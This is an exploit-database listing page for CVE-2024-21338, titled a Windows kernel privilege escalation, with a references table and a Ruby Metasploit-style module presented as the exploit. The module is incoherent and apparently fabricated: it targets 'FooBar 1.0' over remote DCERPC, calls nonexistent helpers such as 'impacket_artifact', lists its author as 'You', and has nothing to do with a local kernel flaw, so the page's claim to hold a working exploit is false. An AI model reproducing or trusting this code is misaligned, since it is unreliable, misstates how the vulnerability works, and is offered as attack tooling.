Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation

🗓️ 02 Apr 2024 00:00:00Reported by E1 CodersType

exploitdb🔗 www.exploit-db.com👁 395 Views

Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation. Exploits vulnerability in FooBar 1.0 for remote code execution

Reporter	Title	Published	Views	Family All 53
0day.today	Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation Exploit	2 Apr 202400:00	–	zdt
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	11 Mar 202611:44	–	githubexploit
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	29 Jul 202413:18	–	githubexploit
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	23 Jun 202406:03	–	githubexploit
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	13 Apr 202405:53	–	githubexploit
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	17 Apr 202410:16	–	githubexploit
ATTACKERKB	CVE-2024-21338	13 Feb 202400:00	–	attackerkb
Information Security Automation	February 2024: Vulremi, Vuldetta, PT VM Course relaunch, PT TrendVulns digests, Ivanti, Fortinet, MSPT, Linux PW	5 Mar 202418:43	–	avleonov
Circl	CVE-2024-21338	13 Feb 202420:06	–	circl
CISA KEV Catalog	Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability	4 Mar 202400:00	–	cisa_kev

#############################################
# Exploit Title :  Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
# Exploit Author: E1 Coders
# CVE: CVE-2024-21338
#############################################

 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact
 
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CVE-2024-21338 Exploit',
        'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
        'Author' => 'You',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-21338']
        ]
      )
    )
 
    register_options(
      [
        OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
        OptPort.new('RPORT', [true, 'The target port', 1234])
      ]
    )
  end
 
  def check
    connect
 
    begin
      impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
    rescue Rex::Post::Meterpreter::RequestError
      return Exploit::CheckCode::Safe
    end
 
    Exploit::CheckCode::Appears
  end
 
  def exploit
    connect
 
    begin
      impacket_artifact(
        dcerpc_binding('ncacn_ip_tcp'),
        'FooBar',
        datastore['FooBarPayload']
      )
    rescue Rex::Post::Meterpreter::RequestError
      fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
    end
 
    handler
    disconnect
  end
end
 
 
#refrence :  https://nvd.nist.gov/vuln/detail/CVE-2024-21338

02 Apr 2024 00:00Current

8.1High risk

Vulners AI Score8.1

CVSS 3.17.8

EPSS0.78644

SSVC